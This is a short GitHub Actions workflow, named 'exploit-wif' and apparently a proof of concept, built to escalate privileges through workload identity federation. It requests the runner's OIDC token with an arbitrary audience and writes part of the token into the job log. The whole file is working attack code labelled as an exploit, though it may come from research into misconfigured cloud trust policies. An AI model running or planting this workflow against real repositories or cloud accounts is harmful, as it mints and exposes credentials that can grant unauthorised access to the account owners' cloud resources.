name: exploit-wif
on:
  workflow_dispatch:

jobs:
  oidc-privesc:
    runs-on: ubuntu-latest

    permissions:
      id-token: write
      contents: read

    steps:
      - name: Obtain OIDC token
        id: oidc
        run: |
          echo "OIDC_TOKEN=$(curl -H \"Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN\" \
                  \"$ACTIONS_ID_TOKEN_REQUEST_URL&audience=foo\" \
                | jq -r '.value')" >> $GITHUB_ENV

      - name: Print
        run: |
          echo "Token acquired"
          echo "${OIDC_TOKEN}" | head -c 200
